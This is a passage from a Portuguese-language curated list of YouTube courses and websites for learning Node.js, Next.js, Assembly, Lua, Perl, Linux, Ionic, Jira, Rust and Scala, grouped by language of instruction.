- [ExpressJS - Intro & Project Setup](https://www.youtube.com/watch?v=39znK--Yo1o&list=PL_cUvD4qzbkwp6pxx27pqgohrsP8v1Wj2&ab_channel=AnsontheDeveloper)
- [How to build NodeJS Microservice - NodeJS Monolithic to Microservice Architecture](https://www.youtube.com/watch?v=EXDkgjU8DDU&list=PLaLqLOj2bk9ZV2RhqXzABUP5QSg42uJEs&ab_channel=CodewithJay)
- [What is Node.js Exactly? - a beginners introduction to Nodejs](https://www.youtube.com/watch?v=pU9Q6oiQNd0&list=PLpXfHEl2fzl5wTERue9mU7AOLXEMcicBc&ab_channel=LearnCode.academy)
- [Node.js in 2022 - Creating and testing a complete Node.js Rest API (WITH NO FRAMEWORKS)](https://www.youtube.com/watch?v=xR4D2bp8_S0&list=PLqFwRPueWb5fl_-rJ_6WdgCn9P87A7WNq&ab_channel=ErickWendel)
## 🦌 Sites e cursos para aprender Next.js
> Cursos para aprender Next.js em Português
- [Desvendando Next.js do ZERO (SSG, SSR, ISR e mais) - Decode #013](https://www.youtube.com/watch?v=2LS6rP3ykJk&ab_channel=Rocketseat)
- [Next.JS e React: Curso Intensivo - Masterclass #01 [2021]](https://www.youtube.com/watch?v=PHKaJlAeNLk&ab_channel=Cod3rCursos)
- [Primeiros passos Next.js | #AluraMais](https://www.youtube.com/watch?v=slmtdlWNwcE&ab_channel=AluraCursosOnline)
- [Primeiros Passos com Next.js](https://www.youtube.com/watch?v=xjrDEZQ5LnA&ab_channel=BoniekyLacerda)
- [Next.js (Renderização React no Lado Servidor) // Dicionário do Programador](https://www.youtube.com/watch?v=q_ZoX98uopM&ab_channel=C%C3%B3digoFonteTV)
- [Por Que Usar Next.JS?](https://www.youtube.com/watch?v=TzufYnZUmz4&ab_channel=Cod3rCursos)
- [Curso Next.js: Introdução - #01](https://www.youtube.com/watch?v=XHrbg2iYNCg&list=PLnDvRpP8BnezfJcfiClWskFOLODeqI_Ft&ab_channel=MatheusBattisti-HoradeCodar)
- [Criando projeto React & NextJS + entendendo React #CursoDeReactNextJS #EP01](https://www.youtube.com/watch?v=BCnUMZUArrM&list=PLeBknJ2kuv1mDABV2N-H2tcu1vbfffRvg&ab_channel=Dev%26Design)
- [Next.js o framework que você deveria conhecer](https://www.youtube.com/watch?v=9eI0o8io7I0&list=PLkFMdTTdI9c2js2bPRUhChVA0jdI-358s&ab_channel=LucasNhimi)
- [Mini curso de Next.js - Aula 1](https://www.youtube.com/watch?v=P3p2LTz5miE&list=PLGQCLOAuF36leMwycZZ9o9uppqgmlGkhj&ab_channel=Andr%C3%A9Coelho)
- [Introdução ao curso de NextJS | NextJS Intensivo](https://www.youtube.com/watch?v=cQ9ydTHx2Q0&list=PLvFchzWFz0yPKjnboH7Oq5jvzuw-7Fl4E&ab_channel=MateusSantana-BeDevLab)
> Cursos para aprender Next.js em Inglês)
- [NEXT.JS Crash Course for Beginners - Build 6 Apps in 17 Hours (SSR, Auth, Full-Stack + More) [2022]](https://www.youtube.com/watch?v=6fNy0iD3hsk&ab_channel=SonnySangha)
- [Next.js React Framework Course – Build and Deploy a Full Stack App From scratch](https://www.youtube.com/watch?v=KjY94sAKLlw&t=6005s&ab_channel=freeCodeCamp.org)
- [Next.js 13 Crash Course | Learn How To Build Full Stack Apps!](https://www.youtube.com/watch?v=T63nY70eZF0&ab_channel=developedbyed)
- [Next.js 13 - The Basics](https://www.youtube.com/watch?v=__mSgDEOyv8&ab_channel=BeyondFireship)
- [The Ultimate NEXT.JS 13 Tutorial (Complete Walkthrough w/ Examples)](https://www.youtube.com/watch?v=6aP9nyTcd44&ab_channel=SonnySangha)
- [Let's build a Modern Portfolio with NEXT.JS (Framer Motion, Tailwind CSS, Sanity.io, React) | 2023](https://www.youtube.com/watch?v=urgi2iz9P6U&ab_channel=SonnySangha)
- [Nextjs ECommerce Tutorial For Beginners 2022 [Next.js, MongoDB & Tailwind]](https://www.youtube.com/watch?v=_IBlyR5mRzA&ab_channel=CodingwithBasir)
- [Next.js for Beginners - Full Course](https://www.youtube.com/watch?v=1WmNXEVia8I&ab_channel=freeCodeCamp.org)
- [Next.js Tutorial - 1 - Introduction](https://www.youtube.com/watch?v=9P8mASSREYM&list=PLC3y8-rFHvwgC9mj0qv972IO5DmD-H0ZH&ab_channel=Codevolution)
- [Complete Next.js Course for Beginners #1 - Introduction](https://www.youtube.com/watch?v=HejT6QXmgtc&list=PLynWqC6VC9KOvExUuzhTFsWaxnpP_97BD&ab_channel=DailyTuition)
- [Next.js Tutorial #1 - Introduction & Setup](https://www.youtube.com/watch?v=A63UxsQsEbU&list=PL4cUxeGkcC9g9gP2onazU5-2M-AzA8eBw&ab_channel=TheNetNinja)
- [Introduction to Next.js | NextJs Tutorial for Beginners #1](https://www.youtube.com/watch?v=DZKOunP-WLQ&list=PLu0W_9lII9agtWvR_TZdb_r0dNI8-lDwG&ab_channel=CodeWithHarry)
- [ntroduction to Next.js – Next vs. Gatsby vs. CRA](https://www.youtube.com/watch?v=uQeidE2LA1s&list=PL6bwFJ82M6FXjyBTVi6WSCWin8q_g_8RR&ab_channel=LeeRobinson)
- [Introduction to Next.js – Next vs. Gatsby vs. CRA](https://www.youtube.com/watch?v=uQeidE2LA1s&list=PL6bwFJ82M6FXjyBTVi6WSCWin8q_g_8RR&ab_channel=LeeRobinson)
- [Build and Deploy THE PERFECT Portfolio Website | Create a Portfolio from Scratch](https://www.youtube.com/watch?v=OPaLnMw2i_0&list=PL6QREj8te1P7gixBDSU8JLvQndTEEX3c3&ab_channel=JavaScriptMastery)
- [NextAuth Course - Complete Authentication with Credentials, Google & GitHub](https://www.youtube.com/watch?v=t0Fs0NO78X8&list=PL2ieA03FJ6Fc34SSXinC2to9T30ztac2M&ab_channel=DailyTuition)
- [NextJS & Tests : Setting Up for Tests in Next.JS (1/6) [react testing library & jest]](https://www.youtube.com/watch?v=S7Qi4kgLH7M&list=PLCBa_75YlKx6cQc0JNZz-L1ZGFb-pOIyL&ab_channel=abhikb)
- [How to Create a Next.js Starter and Add Sass to a Next.js React App](https://www.youtube.com/watch?v=oFGs_x7kxZg&list=PLFsfg2xP7cbI1U7BZJwmJwTVs4D0pqX1F&ab_channel=ColbyFayock)
## 🦘 Sites e cursos para aprender Assembly
> Cursos para aprender Assembly em Português
- [Assembly na Prática](https://www.youtube.com/playlist?list=PLxTkH01AauxRm0LFLlOA9RR5O6hBLqBtC)
- [Curso de Assembly com Snes e Mega Drive](https://www.youtube.com/playlist?list=PLLFRf_pkM7b6Vi0ehPPovl1gQ5ubHTy5P)
- [Curso de Assembly para PIC](https://www.youtube.com/playlist?list=PLZ8dBTV2_5HQd6f4IaoO50L6oToxQMFYt)
- [Minicurso Programação Assembly x86 MASM32](https://www.youtube.com/playlist?list=PLmKKLDrwQKd6iL3rXIbIowc4GWMgYh_iH)
- [Minicurso: Linguagem Assembly 8086 no DEBUG](https://www.youtube.com/playlist?list=PL838IdaPZmcsxX3HwxFSkxm5S_-4wqcYp)
- [Curso de Assembly - Minilord](https://www.youtube.com/playlist?list=PLhkvr9d5St4VmgSpGoeXcQamYl8vBiMeH)
- [Papo binario - Assembly](https://www.youtube.com/playlist?list=PLWHiAJhsj4eXi1AF6N5MYz61RcwSCoVO8)
> Cursos para aprender Assembly em Inglês
- [Assembly Language Programming with ARM – Full Tutorial for Beginners](https://www.youtube.com/watch?v=gfmRrPjnEw4&ab_channel=freeCodeCamp.org)
- [Modern x64 Assembly](https://www.youtube.com/playlist?list=PLKK11Ligqitg9MOX3-0tFT1Rmh3uJp7kA)
- [Assembly Language Programming](https://www.youtube.com/playlist?list=PLPedo-T7QiNsIji329HyTzbKBuCAHwNFC)
- [Intro to x86 Assembly Language](https://www.youtube.com/playlist?list=PLmxT2pVYo5LB5EzTPZGfFN0c2GDiSXgQe)
- [x86 Assembly](https://www.youtube.com/playlist?list=PLan2CeTAw3pFOq5qc9urw8w7R-kvAT8Yb)
## 🦒 Sites e cursos para aprender Lua
> Cursos para aprender Lua em Português
- [Introdução a Lua, instalação e primeiro programa em Lua - Curso de Lua - Aula 01](https://www.youtube.com/watch?v=J9iZeIk2OII&list=PLx4x_zx8csUhdMczA1OSq9rM7N48L6OLU&ab_channel=CFBCursos)
- [Curso de Lua - Aula 01 - Introdução e Ambiente](https://www.youtube.com/watch?v=3BA_fK0yXrI&list=PLa4jh645PxpfOYT5bNkim9yoevX8dCYpt&ab_channel=Techiesse)
- [Introdução a Programação - 00 - Sobre o Curso - É Válido e Atualizado?](https://www.youtube.com/watch?v=_EyRsqA_tKA&list=PLqYboeh3Jru55Yq4J08zsBoOwwwjUtZNA&ab_channel=AlfredBaudisch%28Pardall%29)
- [Introdução e configuração do ambiente - Curso programação Lua Language](https://www.youtube.com/watch?v=W_XTAaO8fiU&list=PLFzjIdwnQBMzaq4srTW6ZEvoJLm2TFvOo&ab_channel=KevinSouza)
- [Aprenda Lua Comigo #0 - Nosso Primeiro Projeto](https://www.youtube.com/watch?v=BhP4ic8qpUA&list=PL61kTUcYddBOFrp8dBlXfRz2Buld6Xx9m&ab_channel=Glider)
- [Aprenda Lua em 20 minutos!](https://www.youtube.com/watch?v=qxoMNzpI_2A&list=PLGVGJmkQU-wd64WNnMVI1Vy9dmpfHDzrH&ab_channel=Luaverse)
- [Introdução ao curso (Opcional)](https://www.youtube.com/watch?v=O6ZwV0ltNlM&list=PL4iMR_FGApjL5ahV00_MbK0j5c9RShuP3&ab_channel=MilionarioScripter)
- [Curso Basico Lua (Capitulo 1)](https://www.youtube.com/watch?v=R3ky9Z786dc&list=PLZKvFeoJSjNnpuiy_ez9PylW8neFp2-gA&ab_channel=MiguelHernandezLiebano)
- [Aprenda Lua em 20 minutos!](https://www.youtube.com/watch?v=qxoMNzpI_2A&ab_channel=Luaverse)
- [Lua - Dicionário do Programador](https://www.youtube.com/watch?v=35Ib4BR7WZc&ab_channel=C%C3%B3digoFonteTV)
> Cursos para aprender Lua em Inglês
- [Full Lua Programming Crash Course - Beginner to Advanced](https://www.youtube.com/watch?v=1srFmjt1Ib0&ab_channel=Steve%27steacher)
- [Game Development with LÖVE 2D and Lua – Full Course](https://www.youtube.com/watch?v=I549C6SmUnk&ab_channel=freeCodeCamp.org)
- [OOP (Object Oriented Programming) - Lua tutorial (Part 15)](https://www.youtube.com/watch?v=xdJZdEAQOEo&ab_channel=Steve%27steacher)
- [Lua Tutorial - DerekBanas](https://www.youtube.com/watch?v=iMacxZQMPXs&ab_channel=DerekBanas)
- [Introduction to the Lua Programming Language - Lua Tutorial (Part 1)](https://www.youtube.com/watch?v=PW8NRGAZQs8&list=PLYBJzqz8zpWavt37pA6NANJTGStIHpybU&ab_channel=Steve%27steacher)
- [Introdução a Programação - 00 - Sobre o Curso - É Válido e Atualizado?](https://www.youtube.com/watch?v=_EyRsqA_tKA&list=PLqYboeh3Jru55Yq4J08zsBoOwwwjUtZNA&ab_channel=AlfredBaudisch%28Pardall%29)
- [Aprendendo Lua: um histórico rápido e primeiros passos com ferramentas de script Lua](https://www.youtube.com/watch?v=-iU1pCgmjx4&list=PLxgtJR7f0RBKGid7F2dfv7qc-xWwSee2O&ab_channel=BurtonsMediaGroup)
- [Lua Introduction](https://www.youtube.com/watch?v=jwn1Vkez7og&list=PLysdvSvCcUhZ3d2AEF4XVAdAyQSBxLNRT&ab_channel=IndronilBanerjee)
- [Lua Programming Tutorials - 1 - Downloading and Installing Lua IDE](https://www.youtube.com/watch?v=R2ozVV61qBQ&list=PLd43cTxFZWlc7vTG-3TgMhfZU6o-7pyLD&ab_channel=TutorialswithGanofins)
## 🐪 Sites e cursos para aprender Perl
> Cursos para aprender Perl em Português
- [Curso Perl - Alder Pinto](https://www.youtube.com/playlist?list=PLE1HNzXaOep0RJIQoWA9_-OPg4WUbjQUZ)
- [Curso de Perl - Perfil Antigo](https://www.youtube.com/playlist?list=PLBDxU1-FpoohxqH3XfnqTqLCxTj8dz5sI)
> Cursos para aprender Perl em Espanhol
- [Tutorial de Perl en Español](https://www.youtube.com/playlist?list=PLjARR1053fYmN9oYz-H6ZI1fOkrjLz6L2)
- [Curso de Perl en Español](https://www.youtube.com/playlist?list=PL8qgaJWZ7bGJPlIvAFbq8fKrFogUEJ3AJ)
- [Curso Perl - David Elí Tupac](https://www.youtube.com/playlist?list=PL2FOMZ1Ba3plgMbgLlxE-8IXi7oIlkdVp)
> Cursos para aprender Perl em Inglês
- [Perl Online Training](https://www.youtube.com/playlist?list=PLWPirh4EWFpE0UEJPQ2PUeXUfvJDhPqSD)
- [Perl Enough to be dangerous](https://www.youtube.com/watch?v=c0k9ieKky7Q&ab_channel=NedDev)
- [Perl Tutorials](https://www.youtube.com/playlist?list=PL_RGaFnxSHWpqRBcStwV0NwMA3nXMh5GC)
- [Perl Tutorial: Basics to Advanced](https://www.youtube.com/playlist?list=PL1h5a0eaDD3rTG1U7w9wmff6ZAKDN3b16)
- [Perl Programming](https://www.youtube.com/playlist?list=PL5eJgcQ87sgcXxN8EG7RUGZ_kTDUDwYX9)
- [Perl Scripting Tutorial Videos](https://www.youtube.com/playlist?list=PL9ooVrP1hQOH9R0GR6yFteE4XWbsYNLga)
## 🐧 Sites e cursos para aprender Linux
> Sites para aprender Linux
- [Tecmint](https://www.tecmint.com/)
- [Linuxize](https://linuxize.com/)
- [nixCraft](https://www.cyberciti.biz/)
- [It's FOSS](https://itsfoss.com/)
- [Linux Hint](https://linuxhint.com/)
- [FOSS Linux](https://www.fosslinux.com/)
- [LinuxOPsys](https://linuxopsys.com/)
- [Linux Journey](https://linuxjourney.com/)
- [Linux Command](https://linuxcommand.org/)
- [Linux Academy](https://linuxacademy.org/)
- [Linux Survival](https://linuxsurvival.com/)
- [Linux Handbook](https://linuxhandbook.com/)
- [Ryan's Tutorials](https://ryanstutorials.net/)
- [LinuxFoundationX](https://www.edx.org/school/linuxfoundationx)
- [LabEx Linux For Noobs](https://labex.io/courses/linux-for-noobs)
- [Conquering the Command Line](http://conqueringthecommandline.com/)
- [Guru99 Linux Tutorial Summary](https://www.guru99.com/unix-linux-tutorial.html)
- [Eduonix Learn Linux From Scratch](https://www.eduonix.com/courses/system-programming/learn-linux-from-scratch)
- [TLDP Advanced Bash Scripting Guide](https://tldp.org/LDP/abs/html/)
- [The Debian Administrator's Handbook](https://debian-handbook.info/)
- [Cyberciti Bash Shell Scripting Tutorial](https://bash.cyberciti.biz/guide/Main_Page)
- [Digital Ocean Getting Started With Linux](https://www.digitalocean.com/community/tutorial_series/getting-started-with-linux)
- [Learn Enough Command Line To Be Dangerous](https://www.learnenough.com/command-line-tutorial)
> Cursos para aprender Linux em Português
- [Curso de Linux - Primeiros Passos](https://www.youtube.com/playlist?list=PLHz_AreHm4dlIXleu20uwPWFOSswqLYbV)
- [Curso de Linux Básico / Certificação LPIC - 1](https://www.youtube.com/playlist?list=PLucm8g_ezqNp92MmkF9p_cj4yhT-fCTl7)
- [Curso de Linux - Matheus Battisti](https://www.youtube.com/playlist?list=PLnDvRpP8BnezDTtL8lm6C-UOJZn-xzALH)
- [Curso GNU/Linux - Paulo Kretcheu](https://www.youtube.com/playlist?list=PLuf64C8sPVT9L452PqdyYCNslctvCMs_n)
- [Curso completo de Linux desde cero para principiantes](https://www.youtube.com/playlist?list=PL2Z95CSZ1N4FKsZQKqCmbylDqssYFJX5A)
- [Curso de Linux Avançado Terminal](https://www.youtube.com/playlist?list=PLGw1E40BSQnRZufbzjGVzkH-O8SngPymp)
- [Curso Grátis Linux Ubuntu Desktop](https://www.youtube.com/playlist?list=PLozhsZB1lLUMHaZmvczDWugUv9ldzX37u)
- [Curso Kali Linux - Daniel Donda](https://www.youtube.com/playlist?list=PLPIvFl3fAVRfzxwHMK1ACl9m4GmwFoxVz)
- [Curso Grátis Linux Ubuntu Server 18.04.x LTS](https://www.youtube.com/playlist?list=PLozhsZB1lLUOjGzjGO4snI34V0zINevDm)
- [Curso de Linux Ubuntu - Portal Hugo Cursos](https://www.youtube.com/playlist?list=PLxNM4ef1Bpxh3gfTUfr3BGmfuLUH4L-5Z)
- [Cursos de Linux - Playlist variada com 148 vídeos](https://www.youtube.com/playlist?list=PLreu0VPCNEMQJBXmyptwC5gDGGGnQnu_u)
- [Curso de Linux Básico para Principiantes 2021](https://www.youtube.com/playlist?list=PLG1hKOHdoXktPkbN_sxqr1fLqDle8wnOh)
- [Revisão Certificação Linux Essentials](https://www.youtube.com/playlist?list=PLsBCFv4w3afsg8QJnMwQbFGumLpwFchc-)
- [Curso completo de Linux do zero - ProfeSantiago](https://www.youtube.com/playlist?list=PLbcS-eIZbbxUqcd3Kr74fo46HzfnYpMqc)
> Cursos para aprender Linux em Inglês
- [The Linux Basics Course: Beginner to Sysadmin, Step by Step](https://www.youtube.com/playlist?list=PLtK75qxsQaMLZSo7KL-PmiRarU7hrpnwK)
- [Linux for Hackers (and everyone)](https://www.youtube.com/playlist?list=PLIhvC56v63IJIujb5cyE13oLuyORZpdkL)
- [Linux Command Line Tutorial For Beginners](https://www.youtube.com/playlist?list=PLS1QulWo1RIb9WVQGJ_vh-RQusbZgO_As)
- [Linux Crash Course](https://www.youtube.com/playlist?list=PLT98CRl2KxKHKd_tH3ssq0HPrThx2hESW)
- [The Complete Kali Linux Course: Beginner to Advanced](https://www.youtube.com/playlist?list=PLYmlEoSHldN7HJapyiQ8kFLUsk_a7EjCw)
- [Linux Online Training](https://www.youtube.com/playlist?list=PLWPirh4EWFpGsim4cuJrh9w6-yfuC9XqI)
- [CompTIA Linux+ XK0-004 Complete Video Course](https://www.youtube.com/playlist?list=PLC5eRS3MXpp-zlq64CcDfzMl2hO2Wtcl0)
- [LPI Linux Essentials (010-160 Exam Prep)](https://www.youtube.com/playlist?list=PL78ppT-_wOmvlYSfyiLvkrsZTdQJ7A24L)
- [Complete Linux course for beginners in Arabic](https://www.youtube.com/playlist?list=PLNSVnXX5qE8VOJ6BgMytvgFpEK2o4sM1o)
- [Linux internals](https://www.youtube.com/playlist?list=PLX1h5Ah4_XcfL2NCX9Tw4Hm9RcHhC14vs)
- [The Complete Red Hat Linux Course: Beginner to Advanced](https://www.youtube.com/playlist?list=PLYmlEoSHldN6W1w_0l-ta8oKzGWqCcq63)
- [Linux for Programmers](https://www.youtube.com/playlist?list=PLzMcBGfZo4-nUIIMsz040W_X-03QH5c5h)
- [Kali Linux: Ethical Hacking Getting Started Course](https://www.youtube.com/playlist?list=PLhfrWIlLOoKMe1Ue0IdeULQvEgCgQ3a1B)
- [Linux Masterclass Course - A Complete Tutorial From Beginner To Advanced](https://www.youtube.com/playlist?list=PL2kSRH_DmWVZp_cu6MMPWkgYh7GZVFS6i)
- [Unix/Linux Tutorial Videos](https://www.youtube.com/playlist?list=PLd3UqWTnYXOloH0vWBs4BtSbP84WcC2NY)
- [Linux Administration Tutorial Videos](https://www.youtube.com/playlist?list=PL9ooVrP1hQOH3SvcgkC4Qv2cyCebvs0Ik)
- [Linux Tutorials | GeeksforGeeks](https://www.youtube.com/playlist?list=PLqM7alHXFySFc4KtwEZTANgmyJm3NqS_L)
- [Linux Operating System - Crash Course for Beginners](https://www.youtube.com/watch?v=ROjZy1WbCIA&ab_channel=freeCodeCamp.org)
- [The Complete Linux Course: Beginner to Power User](https://www.youtube.com/watch?v=wBp0Rb-ZJak&ab_channel=JosephDelgadillo)
- [The 50 Most Popular Linux & Terminal Commands - Full Course for Beginners](https://www.youtube.com/watch?v=ZtqBQ68cfJc&ab_channel=freeCodeCamp.org)
- [Linux Server Course - System Configuration and Operation](https://www.youtube.com/watch?v=WMy3OzvBWc0&ab_channel=freeCodeCamp.org)
- [Linux Tutorial for Beginners - Intellipaat](https://www.youtube.com/watch?v=4ZHvZge1Lsw&ab_channel=Intellipaat)
## 🦥 Sites e cursos para aprender Ionic
> Cursos para aprender Ionic em Português
- [Ionic - Dicionário do Programador](https://www.youtube.com/watch?v=5QqvO_9LPzQ&ab_channel=C%C3%B3digoFonteTV)
- [Curso Ionic Completo 2022 [Iniciantes] + Desafios + Criando um Aplicativo!](https://www.youtube.com/watch?v=gEVYAdwDHwg&t=5894s&ab_channel=WhileTrue)
- [Conhecendo o Ionic Framework](https://www.youtube.com/watch?v=HUBg2VTYRPo&list=PLuXkauUmG1ZH7iJfW5GpAKAQTo_NL5PZ7&ab_channel=RonanAdrielZenatti)
- [Introdução ao Ionic](https://www.youtube.com/watch?v=qr9jS-ZrWpo&list=PLfhMD9jnhSMny0jU_azpnLhvsPWsvRv0q&ab_channel=JulianaCristinadosSantos)
- [Curso de Ionic 6 - Aula 01 - Aplicativos Android e IOS](https://www.youtube.com/watch?v=mMQbYiHy59Q&list=PLxNM4ef1BpxgBAqQsMHhwBH6EmwQOD7Rq&ab_channel=PortalHugoCursos)
- [Curso - Desenvolvimento de apps com Ionic | 01 - Apresentação](https://www.youtube.com/watch?v=xABQOK5vFZQ&list=PLVG76XkqmT1-a738T809H1xPMONh910Dl&ab_channel=JardelGarcia)
- [Ionic 6 com Mysql - Aula 01 - Aplicativos Mobile](https://www.youtube.com/watch?v=ZYM9FYKTDnA&list=PLxNM4ef1BpxirvhqM-E96LdFPlDU8Wg6w&ab_channel=PortalHugoCursos)
- [Ionic 3 Essencial - 1 Introdução](https://www.youtube.com/watch?v=kx7f_5IJXY8&list=PLswa9HeoJUq_Dphg3w1TwqBMgruzRCwIO&ab_channel=CodeExperts)
- [Desenvolvimento de Aplicativos - Aula 01 - Introdução ao Curso](https://www.youtube.com/watch?v=hz7-z9JGQFw&list=PLxNM4ef1BpxgA3RP3L3Y___xZPc1g2h-5&ab_channel=PortalHugoCursos)
- [Criando Aplicativos com Ionic | Preparação do Ambiente | Aula 1](https://www.youtube.com/watch?v=eb5i6nus8vo&list=PLxIWikUsH2nSlBxyxEEgVUTBRYbDWmFC9&ab_channel=Programa%C3%A7%C3%A3odeQuinta)
- [Curso de Ionic - Aula 01 - Desenvolvimento de Aplicativos](https://www.youtube.com/watch?v=fOO6D1lb0OQ&list=PLxNM4ef1BpxgcK0J97u3aSJo30UIfpbNN&ab_channel=PortalHugoCursos)
- [Ionic #01 - INSTALANDO e criando o PRIMEIRO PROJETO](https://www.youtube.com/watch?v=y2hBKxJhfGM&list=PLuUvvidbi-uCGT4LycMif1VVNhC-ZF-pi&ab_channel=SthefaneSoares-VidaPrograma%C3%A7%C3%A3o)
- [Ionic COM MYSQL E PHP - AULA 01 - INTRODUÇÃO AO CURSO](https://www.youtube.com/watch?v=k_VbSstZ52A&list=PLSEfgw3tr7tPtncnFpMEymvVFNiRY3OpZ&ab_channel=GliderSI)
> Cursos para aprender Ionic em Inglês
- [How to Build Your First Ionic 6 App with API Calls](https://www.youtube.com/watch?v=y_vwf15eADs&ab_channel=SimonGrimm)
- [Ionic 4 & Angular Tutorial For Beginners - Crash Course](https://www.youtube.com/watch?v=r2ga-iXS5i4&ab_channel=Academind)
- [Ionic Framework 4 - Full Tutorial - iOS / Android App Development](https://www.youtube.com/watch?v=AvbuIRg8_Jg&ab_channel=freeCodeCamp.org)
- [How to create your first mobile app using Ionic Angular](https://www.youtube.com/watch?v=whnA4Eod3xo&ab_channel=CodeSwag)
- [Ionic Framework explained in 60 seconds](https://www.youtube.com/watch?v=iLLXfPwrtj0&ab_channel=AlanMontgomery)
- [Building a Deliveroo Food Ordering UI with Ionic](https://www.youtube.com/watch?v=82iWIKejaiQ&ab_channel=SimonGrimm)
- [Ionic 5 Tutorial #1 - Welcome to Ionic 5 For Beginners](https://www.youtube.com/watch?v=PExk4luoBiE&list=PLQfqQHJBFM18zcPVbRUIuJYCnytKG4oSn&ab_channel=ZinoTrustAcademy)
- [Ionic Tutorial #1 - Overview, installation and creating the project](https://www.youtube.com/watch?v=5Gj4Y8zvl-s&list=PLlyAM-8-I7S9iNcZRfP4SQJhm4Mw5q5ku&ab_channel=ITwithPauloAlves)
- [ionic 4+: Search Bar - Módulos - Filtros](https://www.youtube.com/watch?v=T5pdU0s4J6w&list=PLWmEuj970qeGbjM8NU0kdmU7Iydve81gC&ab_channel=FernandoHerrera)
- [Ionic Framework Tutorial 1: Create Mobile Apps Using Ionic (Intro)](https://www.youtube.com/watch?v=0jamhGf-8ww&list=PLYxzS__5yYQljbuGjaeugpqs9U07gS5P5&ab_channel=codedamn)
- [Ionic 6+ ALL IN 1 DELIVERY APP UI | EPISODE 01 - HOME SCREEN](https://www.youtube.com/watch?v=FOnsC9pXbqc&list=PLixvNT19uDK7pO5KLKqTFf7QxY2lgqN2L&ab_channel=CodingTechnyks)
- [#1: Introduction - Ionic 5 / React / Firebase](https://www.youtube.com/watch?v=BX9bSrfwy7Y&list=PLYxzS__5yYQkxcATbHyMA6wfEinKL6jPD&ab_channel=codedamn)
- [This app is amazing | App Review | Ionic, ReactJS, Flutter](https://www.youtube.com/watch?v=J8mSfAQvzJc&list=PLNFwX8PVq5q5K_ztYB5umsEu9p6SOQQSb&ab_channel=SimonGrimm)
## 🦦 Sites e cursos para aprender Jira
> Cursos para aprender Jira em Português
- [Curso Jira Software básico](https://www.youtube.com/playlist?list=PL7NDvV6PnYODio6jp-dYLXPL8SQHzTJxy)
- [Jira Software 2022: Básico de Jira para Devs, POs e SMs](https://www.youtube.com/watch?v=642AqqkpgRA&ab_channel=Moxie-EspecialistasemJira)
- [Jira Software - Visão Geral ( Tutorial Simples e Completo do Jira Software )](https://www.youtube.com/watch?v=o7tbOHcNQuQ&ab_channel=Moxie-EspecialistasemJira)
- [Básico de Jira para Devs, POs e SMs](https://www.youtube.com/watch?v=SbHfEMYKXgA&ab_channel=LuizTools)
> Cursos para aprender Jira em Inglês
- [Jira Training | Jira Tutorial for Beginners | Jira Course | Intellipaat](https://www.youtube.com/watch?v=uM_m6EzMg3k&ab_channel=Intellipaat)
- [How to Get A Jira Certification | Atlassian Jira](https://www.youtube.com/watch?v=UfiM2Ob1Jmc&ab_channel=ApetechTechTutorials)
- [Jira Tutorial for Beginners: Jira Project Management](https://www.youtube.com/watch?v=nHuhojfjeUY&ab_channel=SimonSezIT)
- [Jira Full Course 4 hours | Jira Tutorial For Beginners | Jira Training | Intellipaat](https://www.youtube.com/watch?v=fhAcJ6Gv1ko&ab_channel=Intellipaat)
- [How To Use Jira Software For Beginners | Jira Project Management Software (2023)](https://www.youtube.com/watch?v=aP7W7zNTM2I&ab_channel=TutorialsbyManizha%26Ryan)
## 🐭 Sites e cursos para aprender Rust
> Cursos para aprender Rust em Português
- [Introdução a linguagem Rustlang | Aprenda Rust | 01](https://www.youtube.com/watch?v=zWXloY0sslE&ab_channel=BrunoRocha-CodeShow)
- [Rust Lang (A Linguagem Mais AMADA de Todas) // Dicionário do Programador](https://www.youtube.com/watch?v=gA-hmH83XHc&ab_channel=C%C3%B3digoFonteTV)
- [Curso rust [ 01 ] - instalação do rustup](https://www.youtube.com/watch?v=K6L43dl9frY&list=PLGtFJAmtESz-V5p-svTX34bGQvNuXEpHE&ab_channel=LinguagemRust)
- [bem vindo ao curso em rust](https://www.youtube.com/watch?v=Hizsjpi66D8&list=PLWmXJQDlXOHX6UdAmXv6euoqDPUtMLpJf&ab_channel=Lanby%CE%BB)
> Cursos para aprender Rust em Inglês
- [Rust Tutorial Full Course](https://www.youtube.com/watch?v=ygL_xcavzQ4&ab_channel=DerekBanas)
- [Why You SHOULDN'T Learn Rust](https://www.youtube.com/watch?v=kOFWIvNowXo&ab_channel=Theo-t3%E2%80%A4gg)
- [Rust Programming Course for Beginners - Tutorial](https://www.youtube.com/watch?v=MsocPEZBd-M&ab_channel=freeCodeCamp.org)
- [Rust Programming Tutorial #1 - Hello World | Getting Started with Rust](https://www.youtube.com/watch?v=vOMJlQ5B-M0&list=PLVvjrrRCBy2JSHf9tGxGKJ-bYAN_uDCUL&ab_channel=dcode)
- [Chapter 1 - Intro - Rust Crash Course](https://www.youtube.com/watch?v=ZxozvCT0oZw&list=PL6yRaaP0WPkWRsXJgdnw9lj1vchAaKwfS&ab_channel=VandadNahavandipoor)
- [Learning Rust From Zero to Hero! - Episode 1](https://www.youtube.com/watch?v=tuRQ1URwvhI&list=PLhaAGnuDAW8TrWfGhWL26XDuHDf_O5bWv&ab_channel=BendotCodes)
- [Learning Rust Together! Going through the Rust Programming book live!](https://www.youtube.com/watch?v=5QsEuoIt7JQ&list=PLSbgTZYkscaoV8me47mKqSM6BBSZ73El6&ab_channel=TomMcGurl)
- [50 Rust Projects - New Playlist Announcement](https://www.youtube.com/watch?v=qru3L4BvrOU&list=PL5dTjWUk_cPYuhHm9_QImW7_u4lr5d6zO&ab_channel=AkhilSharma)
- [Best FREE Rust Learning Resources](https://www.youtube.com/watch?v=T4E8LSCFHu8&ab_channel=Let%27sGetRusty)
- [Introduction to the series [1 of 35] | Rust for Beginners](https://www.youtube.com/watch?v=PpWR6zungUk&list=PLlrxD0HtieHjbTjrchBwOVks_sr8EVW1x&ab_channel=MicrosoftDeveloper)
- [Rust Crash Course | Rustlang](https://www.youtube.com/watch?v=zF34dRivLOw&ab_channel=TraversyMedia)
- [Rust in 100 Seconds](https://www.youtube.com/watch?v=5C_HPTJg5ek&ab_channel=Fireship)
## 🐁 Sites e cursos para aprender Scala
> Cursos para aprender Scala em Português
- [Mini Curso Scala Aula 01 - Por que utilizar a linguagem Scala?](https://www.youtube.com/watch?v=WoOZuiM28LI&list=PLRjtXwBVDaEhUXvT9s3f9T8KhzvbNIOBQ&ab_channel=DanielGoncalves)
> Cursos para aprender Scala em Inglês
- [Scala Tutorial - Scala at Light Speed, Part 1: Getting Started](https://www.youtube.com/watch?v=-8V6bMjThNo&list=PLmtsMNDRU0BxryRX4wiwrTZ661xcp6VPM&ab_channel=RocktheJVM)
